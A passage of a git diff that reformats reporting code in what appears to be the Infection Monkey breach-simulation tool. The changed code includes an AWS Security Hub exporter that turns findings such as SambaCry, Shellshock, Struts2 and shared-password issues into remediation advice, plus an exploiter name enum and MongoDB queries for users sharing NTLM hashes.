- e
- )
+ "AWS exporter called but AWS-CLI security hub service is not installed. "
+ "Error: {}".format(e)
)
return False
except Exception as e:
@@ -123,20 +123,20 @@ class AWSExporter(Exporter):
@staticmethod
def _get_finding_resource(instance_id, instance_arn):
if instance_id:
- return [{"Type": "AwsEc2Instance", "Id": instance_arn.format(instance_id=instance_id)}]
+ return [{"Type":"AwsEc2Instance", "Id":instance_arn.format(instance_id=instance_id)}]
else:
- return [{"Type": "Other", "Id": "None"}]
+ return [{"Type":"Other", "Id":"None"}]
@staticmethod
def _build_generic_finding(
- severity, title, description, recommendation, instance_arn, instance_id=None
+ severity, title, description, recommendation, instance_arn, instance_id=None
):
finding = {
- "Severity": {"Product": severity, "Normalized": 100},
- "Resources": AWSExporter._get_finding_resource(instance_id, instance_arn),
- "Title": title,
- "Description": description,
- "Remediation": {"Recommendation": {"Text": recommendation}},
+ "Severity":{"Product":severity, "Normalized":100},
+ "Resources":AWSExporter._get_finding_resource(instance_id, instance_arn),
+ "Title":title,
+ "Description":description,
+ "Remediation":{"Recommendation":{"Text":recommendation}},
}
return finding
@@ -145,276 +145,322 @@ class AWSExporter(Exporter):
def _handle_tunnel_issue(issue, instance_arn):
return AWSExporter._build_generic_finding(
- severity=5,
- title="Weak segmentation - Machines were able to communicate over unused ports.",
- description="Use micro-segmentation policies to disable communication other than the required.",
- recommendation="Machines are not locked down at port level. "
- "Network tunnel was set up from {0} to {1}".format(issue["machine"], issue["dest"]),
- instance_arn=instance_arn,
- instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
+ severity=5,
+ title="Weak segmentation - Machines were able to communicate over unused ports.",
+ description="Use micro-segmentation policies to disable communication other than "
+ "the required.",
+ recommendation="Machines are not locked down at port level. "
+ "Network tunnel was set up from {0} to {1}".format(issue["machine"],
+ issue["dest"]),
+ instance_arn=instance_arn,
+ instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
)
@staticmethod
def _handle_sambacry_issue(issue, instance_arn):
return AWSExporter._build_generic_finding(
- severity=10,
- title="Samba servers are vulnerable to 'SambaCry'",
- description="Change {0} password to a complex one-use password that is not shared with other computers on the "
- "network. Update your Samba server to 4.4.14 and up, "
- "4.5.10 and up, or 4.6.4 and up.".format(issue["username"]),
- recommendation="The machine {0} ({1}) is vulnerable to a SambaCry attack. The Monkey authenticated over the SMB "
- "protocol with user {2} and its password, and used the SambaCry "
- "vulnerability.".format(issue["machine"], issue["ip_address"], issue["username"]),
- instance_arn=instance_arn,
- instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
+ severity=10,
+ title="Samba servers are vulnerable to 'SambaCry'",
+ description="Change {0} password to a complex one-use password that is not shared "
+ "with other computers on the "
+ "network. Update your Samba server to 4.4.14 and up, "
+ "4.5.10 and up, or 4.6.4 and up.".format(issue["username"]),
+ recommendation="The machine {0} ({1}) is vulnerable to a SambaCry attack. The "
+ "Monkey authenticated over the SMB "
+ "protocol with user {2} and its password, and used the SambaCry "
+ "vulnerability.".format(issue["machine"], issue["ip_address"],
+ issue["username"]),
+ instance_arn=instance_arn,
+ instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
)
@staticmethod
def _handle_smb_pth_issue(issue, instance_arn):
return AWSExporter._build_generic_finding(
- severity=5,
- title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.",
- description="Change {0}'s password to a complex one-use password that is not shared with other computers on the "
- "network.".format(issue["username"]),
- recommendation="The machine {0}({1}) is vulnerable to a SMB attack. The Monkey used a pass-the-hash attack over "
- "SMB protocol with user {2}.".format(
- issue["machine"], issue["ip_address"], issue["username"]
- ),
- instance_arn=instance_arn,
- instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
+ severity=5,
+ title="Machines are accessible using passwords supplied by the user during the "
+ "Monkey's configuration.",
+ description="Change {0}'s password to a complex one-use password that is not "
+ "shared with other computers on the "
+ "network.".format(issue["username"]),
+ recommendation="The machine {0}({1}) is vulnerable to a SMB attack. The Monkey "
+ "used a pass-the-hash attack over "
+ "SMB protocol with user {2}.".format(
+ issue["machine"], issue["ip_address"], issue["username"]
+ ),
+ instance_arn=instance_arn,
+ instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
)
@staticmethod
def _handle_ssh_issue(issue, instance_arn):
return AWSExporter._build_generic_finding(
- severity=1,
- title="Machines are accessible using SSH passwords supplied by the user during the Monkey's configuration.",
- description="Change {0}'s password to a complex one-use password that is not shared with other computers on the "
- "network.".format(issue["username"]),
- recommendation="The machine {0} ({1}) is vulnerable to a SSH attack. The Monkey authenticated over the SSH"
- " protocol with user {2} and its "
- "password.".format(issue["machine"], issue["ip_address"], issue["username"]),
- instance_arn=instance_arn,
- instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
+ severity=1,
+ title="Machines are accessible using SSH passwords supplied by the user during "
+ "the Monkey's configuration.",
+ description="Change {0}'s password to a complex one-use password that is not "
+ "shared with other computers on the "
+ "network.".format(issue["username"]),
+ recommendation="The machine {0} ({1}) is vulnerable to a SSH attack. The Monkey "
+ "authenticated over the SSH"
+ " protocol with user {2} and its "
+ "password.".format(issue["machine"], issue["ip_address"],
+ issue["username"]),
+ instance_arn=instance_arn,
+ instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
)
@staticmethod
def _handle_ssh_key_issue(issue, instance_arn):
return AWSExporter._build_generic_finding(
- severity=1,
- title="Machines are accessible using SSH passwords supplied by the user during the Monkey's configuration.",
- description="Protect {ssh_key} private key with a pass phrase.".format(
- ssh_key=issue["ssh_key"]
- ),
- recommendation="The machine {machine} ({ip_address}) is vulnerable to a SSH attack. The Monkey authenticated "
- "over the SSH protocol with private key {ssh_key}.".format(
- machine=issue["machine"], ip_address=issue["ip_address"], ssh_key=issue["ssh_key"]
- ),
- instance_arn=instance_arn,
- instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
+ severity=1,
+ title="Machines are accessible using SSH passwords supplied by the user during "
+ "the Monkey's configuration.",
+ description="Protect {ssh_key} private key with a pass phrase.".format(
+ ssh_key=issue["ssh_key"]
+ ),
+ recommendation="The machine {machine} ({ip_address}) is vulnerable to a SSH "
+ "attack. The Monkey authenticated "
+ "over the SSH protocol with private key {ssh_key}.".format(
+ machine=issue["machine"], ip_address=issue["ip_address"],
+ ssh_key=issue["ssh_key"]
+ ),
+ instance_arn=instance_arn,
+ instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
)
@staticmethod
def _handle_elastic_issue(issue, instance_arn):
return AWSExporter._build_generic_finding(
- severity=10,
- title="Elastic Search servers are vulnerable to CVE-2015-1427",
- description="Update your Elastic Search server to version 1.4.3 and up.",
- recommendation="The machine {0}({1}) is vulnerable to an Elastic Groovy attack. The attack was made "
- "possible because the Elastic Search server was not patched against CVE-2015-1427.".format(
- issue["machine"], issue["ip_address"]
- ),
- instance_arn=instance_arn,
- instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
+ severity=10,
+ title="Elastic Search servers are vulnerable to CVE-2015-1427",
+ description="Update your Elastic Search server to version 1.4.3 and up.",
+ recommendation="The machine {0}({1}) is vulnerable to an Elastic Groovy attack. "
+ "The attack was made "
+ "possible because the Elastic Search server was not patched "
+ "against CVE-2015-1427.".format(issue["machine"],
+ issue["ip_address"]),
+ instance_arn=instance_arn,
+ instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
)
@staticmethod
def _handle_island_cross_segment_issue(issue, instance_arn):
return AWSExporter._build_generic_finding(
- severity=1,
- title="Weak segmentation - Machines from different segments are able to communicate.",
- description="Segment your network and make sure there is no communication between machines from different "
- "segments.",
- recommendation="The network can probably be segmented. A monkey instance on \
+ severity=1,
+ title="Weak segmentation - Machines from different segments are able to "
+ "communicate.",
+ description="Segment your network and make sure there is no communication between "
+ "machines from different "
+ "segments.",
+ recommendation="The network can probably be segmented. A monkey instance on \
{0} in the networks {1} \
could directly access the Monkey Island server in the networks {2}.".format(
- issue["machine"], issue["networks"], issue["server_networks"]
- ),
- instance_arn=instance_arn,
- instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
+ issue["machine"], issue["networks"], issue["server_networks"]
+ ),
+ instance_arn=instance_arn,
+ instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
)
@staticmethod
def _handle_shared_passwords_issue(issue, instance_arn):
return AWSExporter._build_generic_finding(
- severity=1,
- title="Multiple users have the same password",
- description="Some users are sharing passwords, this should be fixed by changing passwords.",
- recommendation="These users are sharing access password: {0}.".format(
- issue["shared_with"]
- ),
- instance_arn=instance_arn,
- instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
+ severity=1,
+ title="Multiple users have the same password",
+ description="Some users are sharing passwords, this should be fixed by changing "
+ "passwords.",
+ recommendation="These users are sharing access password: {0}.".format(
+ issue["shared_with"]
+ ),
+ instance_arn=instance_arn,
+ instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
)
@staticmethod
def _handle_shellshock_issue(issue, instance_arn):
return AWSExporter._build_generic_finding(
- severity=10,
- title="Machines are vulnerable to 'Shellshock'",
- description="Update your Bash to a ShellShock-patched version.",
- recommendation="The machine {0} ({1}) is vulnerable to a ShellShock attack. "
- "The attack was made possible because the HTTP server running on TCP port {2} was vulnerable to a "
- "shell injection attack on the paths: {3}.".format(
- issue["machine"], issue["ip_address"], issue["port"], issue["paths"]
- ),
- instance_arn=instance_arn,
- instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
+ severity=10,
+ title="Machines are vulnerable to 'Shellshock'",
+ description="Update your Bash to a ShellShock-patched version.",
+ recommendation="The machine {0} ({1}) is vulnerable to a ShellShock attack. "
+ "The attack was made possible because the HTTP server running on "
+ "TCP port {2} was vulnerable to a "
+ "shell injection attack on the paths: {3}.".format(
+ issue["machine"], issue["ip_address"], issue["port"], issue["paths"]
+ ),
+ instance_arn=instance_arn,
+ instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
)
@staticmethod
def _handle_smb_password_issue(issue, instance_arn):
return AWSExporter._build_generic_finding(
- severity=1,
- title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.",
- description="Change {0}'s password to a complex one-use password that is not shared with other computers on the "
- "network.".format(issue["username"]),
- recommendation="The machine {0} ({1}) is vulnerable to a SMB attack. The Monkey authenticated over the SMB "
- "protocol with user {2} and its password.".format(
- issue["machine"], issue["ip_address"], issue["username"]
- ),
- instance_arn=instance_arn,
- instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
+ severity=1,
+ title="Machines are accessible using passwords supplied by the user during the "
+ "Monkey's configuration.",
+ description="Change {0}'s password to a complex one-use password that is not "
+ "shared with other computers on the "
+ "network.".format(issue["username"]),
+ recommendation="The machine {0} ({1}) is vulnerable to a SMB attack. The Monkey "
+ "authenticated over the SMB "
+ "protocol with user {2} and its password.".format(
+ issue["machine"], issue["ip_address"], issue["username"]
+ ),
+ instance_arn=instance_arn,
+ instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
)
@staticmethod
def _handle_wmi_password_issue(issue, instance_arn):
return AWSExporter._build_generic_finding(
- severity=1,
- title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.",
- description="Change {0}'s password to a complex one-use password that is not shared with other computers on the "
- "network.",
- recommendation="The machine {machine} ({ip_address}) is vulnerable to a WMI attack. The Monkey authenticated over "
- "the WMI protocol with user {username} and its password.".format(
- machine=issue["machine"], ip_address=issue["ip_address"], username=issue["username"]
- ),
- instance_arn=instance_arn,
- instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
+ severity=1,
+ title="Machines are accessible using passwords supplied by the user during the "
+ "Monkey's configuration.",
+ description="Change {0}'s password to a complex one-use password that is not "
+ "shared with other computers on the "
+ "network.",
+ recommendation="The machine {machine} ({ip_address}) is vulnerable to a WMI "
+ "attack. The Monkey authenticated over "
+ "the WMI protocol with user {username} and its password.".format(
+ machine=issue["machine"], ip_address=issue["ip_address"],
+ username=issue["username"]
+ ),
+ instance_arn=instance_arn,
+ instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
)
@staticmethod
def _handle_wmi_pth_issue(issue, instance_arn):
return AWSExporter._build_generic_finding(
- severity=1,
- title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.",
- description="Change {0}'s password to a complex one-use password that is not shared with other computers on the "
- "network.".format(issue["username"]),
- recommendation="The machine {machine} ({ip_address}) is vulnerable to a WMI attack. The Monkey used a "
- "pass-the-hash attack over WMI protocol with user {username}".format(
- machine=issue["machine"], ip_address=issue["ip_address"], username=issue["username"]
- ),
- instance_arn=instance_arn,
- instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
+ severity=1,
+ title="Machines are accessible using passwords supplied by the user during the "
+ "Monkey's configuration.",
+ description="Change {0}'s password to a complex one-use password that is not "
+ "shared with other computers on the "
+ "network.".format(issue["username"]),
+ recommendation="The machine {machine} ({ip_address}) is vulnerable to a WMI "
+ "attack. The Monkey used a "
+ "pass-the-hash attack over WMI protocol with user {username}".format(
+ machine=issue["machine"], ip_address=issue["ip_address"],
+ username=issue["username"]
+ ),
+ instance_arn=instance_arn,
+ instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
)
@staticmethod
def _handle_shared_passwords_domain_issue(issue, instance_arn):
return AWSExporter._build_generic_finding(
- severity=1,
- title="Multiple users have the same password.",
- description="Some domain users are sharing passwords, this should be fixed by changing passwords.",
- recommendation="These users are sharing access password: {shared_with}.".format(
- shared_with=issue["shared_with"]
- ),
- instance_arn=instance_arn,
- instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
+ severity=1,
+ title="Multiple users have the same password.",
+ description="Some domain users are sharing passwords, this should be fixed by "
+ "changing passwords.",
+ recommendation="These users are sharing access password: {shared_with}.".format(
+ shared_with=issue["shared_with"]
+ ),
+ instance_arn=instance_arn,
+ instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
)
@staticmethod
def _handle_shared_admins_domain_issue(issue, instance_arn):
return AWSExporter._build_generic_finding(
- severity=1,
- title="Shared local administrator account - Different machines have the same account as a local administrator.",
- description="Make sure the right administrator accounts are managing the right machines, and that there isn't "
- "an unintentional local admin sharing.",
- recommendation="Here is a list of machines which the account {username} is defined as an administrator: "
- "{shared_machines}".format(
- username=issue["username"], shared_machines=issue["shared_machines"]
- ),
- instance_arn=instance_arn,
- instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
+ severity=1,
+ title="Shared local administrator account - Different machines have the same "
+ "account as a local administrator.",
+ description="Make sure the right administrator accounts are managing the right "
+ "machines, and that there isn't "
+ "an unintentional local admin sharing.",
+ recommendation="Here is a list of machines which the account {username} is "
+ "defined as an administrator: "
+ "{shared_machines}".format(
+ username=issue["username"], shared_machines=issue["shared_machines"]
+ ),
+ instance_arn=instance_arn,
+ instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
)
@staticmethod
def _handle_strong_users_on_crit_issue(issue, instance_arn):
return AWSExporter._build_generic_finding(
- severity=1,
- title="Mimikatz found login credentials of a user who has admin access to a server defined as critical.",
- description="This critical machine is open to attacks via strong users with access to it.",
- recommendation="The services: {services} have been found on the machine thus classifying it as a critical "
- "machine. These users has access to it:{threatening_users}.".format(
- services=issue["services"], threatening_users=issue["threatening_users"]
- ),
- instance_arn=instance_arn,
- instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
+ severity=1,
+ title="Mimikatz found login credentials of a user who has admin access to a "
+ "server defined as critical.",
+ description="This critical machine is open to attacks via strong users with "
+ "access to it.",
+ recommendation="The services: {services} have been found on the machine thus "
+ "classifying it as a critical "
+ "machine. These users has access to it:{threatening_users}.".format(
+ services=issue["services"], threatening_users=issue["threatening_users"]
+ ),
+ instance_arn=instance_arn,
+ instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
)
@staticmethod
def _handle_struts2_issue(issue, instance_arn):
return AWSExporter._build_generic_finding(
- severity=10,
- title="Struts2 servers are vulnerable to remote code execution.",
- description="Upgrade Struts2 to version 2.3.32 or 2.5.10.1 or any later versions.",
- recommendation="Struts2 server at {machine} ({ip_address}) is vulnerable to remote code execution attack."
- "The attack was made possible because the server is using an old version of Jakarta based file "
- "upload Multipart parser.".format(
- machine=issue["machine"], ip_address=issue["ip_address"]
- ),
- instance_arn=instance_arn,
- instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
+ severity=10,
+ title="Struts2 servers are vulnerable to remote code execution.",
+ description="Upgrade Struts2 to version 2.3.32 or 2.5.10.1 or any later versions.",
+ recommendation="Struts2 server at {machine} ({ip_address}) is vulnerable to "
+ "remote code execution attack."
+ "The attack was made possible because the server is using an old "
+ "version of Jakarta based file "
+ "upload Multipart parser.".format(
+ machine=issue["machine"], ip_address=issue["ip_address"]
+ ),
+ instance_arn=instance_arn,
+ instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
)
@staticmethod
def _handle_weblogic_issue(issue, instance_arn):
return AWSExporter._build_generic_finding(
- severity=10,
- title="Oracle WebLogic servers are vulnerable to remote code execution.",
- description="Install Oracle critical patch updates. Or update to the latest version. "
- "Vulnerable versions are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.",
- recommendation="Oracle WebLogic server at {machine} ({ip_address}) is vulnerable to remote code execution attack."
- "The attack was made possible due to incorrect permission assignment in Oracle Fusion Middleware "
- "(subcomponent: WLS Security).".format(
- machine=issue["machine"], ip_address=issue["ip_address"]
- ),
- instance_arn=instance_arn,
- instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
+ severity=10,
+ title="Oracle WebLogic servers are vulnerable to remote code execution.",
+ description="Install Oracle critical patch updates. Or update to the latest "
+ "version. "
+ "Vulnerable versions are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and "
+ "12.2.1.2.0.",
+ recommendation="Oracle WebLogic server at {machine} ({ip_address}) is vulnerable "
+ "to remote code execution attack."
+ "The attack was made possible due to incorrect permission "
+ "assignment in Oracle Fusion Middleware "
+ "(subcomponent: WLS Security).".format(
+ machine=issue["machine"], ip_address=issue["ip_address"]
+ ),
+ instance_arn=instance_arn,
+ instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
)
@staticmethod
def _handle_hadoop_issue(issue, instance_arn):
return AWSExporter._build_generic_finding(
- severity=10,
- title="Hadoop/Yarn servers are vulnerable to remote code execution.",
- description="Run Hadoop in secure mode, add Kerberos authentication.",
- recommendation="The Hadoop server at {machine} ({ip_address}) is vulnerable to remote code execution attack."
- "The attack was made possible due to default Hadoop/Yarn configuration being insecure.",
- instance_arn=instance_arn,
- instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
+ severity=10,
+ title="Hadoop/Yarn servers are vulnerable to remote code execution.",
+ description="Run Hadoop in secure mode, add Kerberos authentication.",
+ recommendation="The Hadoop server at {machine} ({ip_address}) is vulnerable to "
+ "remote code execution attack."
+ "The attack was made possible due to default Hadoop/Yarn "
+ "configuration being insecure.",
+ instance_arn=instance_arn,
+ instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
)
diff --git a/monkey/monkey_island/cc/services/reporting/exporter_init.py b/monkey/monkey_island/cc/services/reporting/exporter_init.py
index c19f3d5e3..f984762ae 100644
--- a/monkey/monkey_island/cc/services/reporting/exporter_init.py
+++ b/monkey/monkey_island/cc/services/reporting/exporter_init.py
@@ -13,9 +13,9 @@ def populate_exporter_list():
if len(manager.get_exporters_list()) != 0:
logger.debug(
- "Populated exporters list with the following exporters: {0}".format(
- str(manager.get_exporters_list())
- )
+ "Populated exporters list with the following exporters: {0}".format(
+ str(manager.get_exporters_list())
+ )
)
diff --git a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py
index e60886b34..988beeec3 100644
--- a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py
+++ b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py
@@ -2,16 +2,20 @@ from dataclasses import dataclass
from enum import Enum
from typing import Type
-from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.cred_exploit import (
+from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors\
+ .cred_exploit import (
CredExploitProcessor,
)
-from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.exploit import (
+from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.exploit \
+ import (
ExploitProcessor,
)
-from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.shellshock_exploit import (
+from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors\
+ .shellshock_exploit import (
ShellShockExploitProcessor,
)
-from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.zerologon import (
+from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.zerologon\
+ import (
ZerologonExploitProcessor,
)
@@ -30,24 +34,24 @@ class ExploiterDescriptorEnum(Enum):
SSH = ExploiterDescriptor("SSHExploiter", "SSH Exploiter", CredExploitProcessor)
SAMBACRY = ExploiterDescriptor("SambaCryExploiter", "SambaCry Exploiter", CredExploitProcessor)
ELASTIC = ExploiterDescriptor(
- "ElasticGroovyExploiter", "Elastic Groovy Exploiter", ExploitProcessor
+ "ElasticGroovyExploiter", "Elastic Groovy Exploiter", ExploitProcessor
)
MS08_067 = ExploiterDescriptor("Ms08_067_Exploiter", "Conficker Exploiter", ExploitProcessor)
SHELLSHOCK = ExploiterDescriptor(
- "ShellShockExploiter", "ShellShock Exploiter", ShellShockExploitProcessor
+ "ShellShockExploiter", "ShellShock Exploiter", ShellShockExploitProcessor
)
STRUTS2 = ExploiterDescriptor("Struts2Exploiter", "Struts2 Exploiter", ExploitProcessor)
WEBLOGIC = ExploiterDescriptor(
- "WebLogicExploiter", "Oracle WebLogic Exploiter", ExploitProcessor
+ "WebLogicExploiter", "Oracle WebLogic Exploiter", ExploitProcessor
)
HADOOP = ExploiterDescriptor("HadoopExploiter", "Hadoop/Yarn Exploiter", ExploitProcessor)
MSSQL = ExploiterDescriptor("MSSQLExploiter", "MSSQL Exploiter", ExploitProcessor)
VSFTPD = ExploiterDescriptor(
- "VSFTPDExploiter", "VSFTPD Backdoor Exploiter", CredExploitProcessor
+ "VSFTPDExploiter", "VSFTPD Backdoor Exploiter", CredExploitProcessor
)
DRUPAL = ExploiterDescriptor("DrupalExploiter", "Drupal Server Exploiter", ExploitProcessor)
ZEROLOGON = ExploiterDescriptor(
- "ZerologonExploiter", "Zerologon Exploiter", ZerologonExploitProcessor
+ "ZerologonExploiter", "Zerologon Exploiter", ZerologonExploitProcessor
)
@staticmethod
diff --git a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/cred_exploit.py b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/cred_exploit.py
index 842fe9eb2..5a85a8a7b 100644
--- a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/cred_exploit.py
+++ b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/cred_exploit.py
@@ -1,8 +1,10 @@
-from monkey_island.cc.services.reporting.issue_processing.exploit_processing.exploiter_report_info import (
+from monkey_island.cc.services.reporting.issue_processing.exploit_processing\
+ .exploiter_report_info import (
CredentialType,
ExploiterReportInfo,
)
-from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.exploit import (
+from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.exploit \
+ import (
ExploitProcessor,
)
diff --git a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/exploit.py b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/exploit.py
index 1b29fc773..9ced6d3ea 100644
--- a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/exploit.py
+++ b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/exploit.py
@@ -1,5 +1,6 @@
from monkey_island.cc.services.node import NodeService
-from monkey_island.cc.services.reporting.issue_processing.exploit_processing.exploiter_report_info import (
+from monkey_island.cc.services.reporting.issue_processing.exploit_processing\
+ .exploiter_report_info import (
ExploiterReportInfo,
)
diff --git a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/shellshock_exploit.py b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/shellshock_exploit.py
index cd627eb5c..cf2859fb4 100644
--- a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/shellshock_exploit.py
+++ b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/shellshock_exploit.py
@@ -1,4 +1,5 @@
-from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.exploit import (
+from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.exploit \
+ import (
ExploiterReportInfo,
ExploitProcessor,
)
diff --git a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/zerologon.py b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/zerologon.py
index d9c9d7d49..e3b370bf4 100644
--- a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/zerologon.py
+++ b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/zerologon.py
@@ -1,4 +1,5 @@
-from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.exploit import (
+from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.exploit \
+ import (
ExploiterReportInfo,
ExploitProcessor,
)
diff --git a/monkey/monkey_island/cc/services/reporting/pth_report.py b/monkey/monkey_island/cc/services/reporting/pth_report.py
index 99c5a7467..ab18ffd21 100644
--- a/monkey/monkey_island/cc/services/reporting/pth_report.py
+++ b/monkey/monkey_island/cc/services/reporting/pth_report.py
@@ -19,7 +19,8 @@ class PTHReportService(object):
@staticmethod
def __dup_passwords_mongoquery():
"""
- This function builds and queries the mongoDB for users that are using the same passwords. this is done
+ This function builds and queries the mongoDB for users that are using the same
+ passwords. this is done
by comparing the NTLM hash found for each user by mimikatz.
:return:
A list of mongo documents (dicts in python) that look like this:
@@ -31,59 +32,62 @@ class PTHReportService(object):
"""
pipeline = [
- {"$match": {"NTLM_secret": {"$exists": "true", "$ne": None}}},
+ {"$match":{"NTLM_secret":{"$exists":"true", "$ne":None}}},
{
- "$group": {
- "_id": {"NTLM_secret": "$NTLM_secret"},
- "count": {"$sum": 1},
- "Docs": {
- "$push": {
- "_id": "$_id",
- "name": "$name",
- "domain_name": "$domain_name",
- "machine_id": "$machine_id",
+ "$group":{
+ "_id":{"NTLM_secret":"$NTLM_secret"},
+ "count":{"$sum":1},
+ "Docs":{
+ "$push":{
+ "_id":"$_id",
+ "name":"$name",
+ "domain_name":"$domain_name",
+ "machine_id":"$machine_id",
}
},
}
},
- {"$match": {"count": {"$gt": 1}}},
+ {"$match":{"count":{"$gt":1}}},
]
return mongo.db.groupsandusers.aggregate(pipeline)
@staticmethod
def __get_admin_on_machines_format(admin_on_machines, domain_name):
"""
- This function finds for each admin user, which machines its an admin of, and compile them to a list.
+ This function finds for each admin user, which machines its an admin of, and compile them
+ to a list.
:param admin_on_machines: A list of "monkey" documents "_id"s
:param domain_name: The admins' domain name
:return:
A list of formatted machines names *domain*/*hostname*, to use in shared admins issues.
"""
- machines = mongo.db.monkey.find({"_id": {"$in": admin_on_machines}}, {"hostname": 1})
+ machines = mongo.db.monkey.find({"_id":{"$in":admin_on_machines}}, {"hostname":1})
return [domain_name + "\\" + i["hostname"] for i in list(machines)]
@staticmethod
def __strong_users_on_crit_query():
"""
- This function build and query the mongoDB for users that mimikatz was able to find cached NTLM hashes and
- are administrators on machines with services predefined as important services thus making these machines
+ This function build and query the mongoDB for users that mimikatz was able to find
+ cached NTLM hashes and
+ are administrators on machines with services predefined as important services thus
+ making these machines
critical.
:return:
A list of said users
"""
pipeline = [
- {"$unwind": "$admin_on_machines"},
- {"$match": {"type": USERTYPE, "domain_name": {"$ne": None}}},
+ {"$unwind":"$admin_on_machines"},
+ {"$match":{"type":USERTYPE, "domain_name":{"$ne":None}}},
{
- "$lookup": {
- "from": "monkey",
- "localField": "admin_on_machines",
- "foreignField": "_id",
- "as": "critical_machine",
+ "$lookup":{
+ "from":"monkey",
+ "localField":"admin_on_machines",
+ "foreignField":"_id",
+ "as":"critical_machine",
}
},
- {"$match": {"critical_machine.critical_services": {"$ne": []}}},
- {"$unwind": "$critical_machine"},
+ {"$match":{"critical_machine.critical_services":{"$ne":[]}}},
+ {"$unwind":"$critical_machine"},
]
return mongo.db.groupsandusers.aggregate(pipeline)
@@ -102,15 +106,15 @@ class PTHReportService(object):
for doc in docs:
users_list = [
{
- "username": user["name"],
- "domain_name": user["domain_name"],
- "hostname": NodeService.get_hostname_by_id(ObjectId(user["machine_id"]))
+ "username":user["name"],
+ "domain_name":user["domain_name"],
+ "hostname":NodeService.get_hostname_by_id(ObjectId(user["machine_id"]))
if user["machine_id"]
else None,
}
for user in doc["Docs"]
]
- users_cred_groups.append({"cred_groups": users_list})
+ users_cred_groups.append({"cred_groups":users_list})
return users_cred_groups
@@ -121,18 +125,18 @@ class PTHReportService(object):
for group in user_groups:
user_info = group["cred_groups"][0]
issues.append(
- {
- "type": "shared_passwords_domain"
- if user_info["domain_name"]
- else "shared_passwords",
- "machine": user_info["hostname"]
- if user_info["hostname"]
- else user_info["domain_name"],
- "shared_with": [
- PTHReportService.__build_dup_user_label(i) for i in group["cred_groups"]
- ],
- "is_local": False if user_info["domain_name"] else True,
- }
+ {
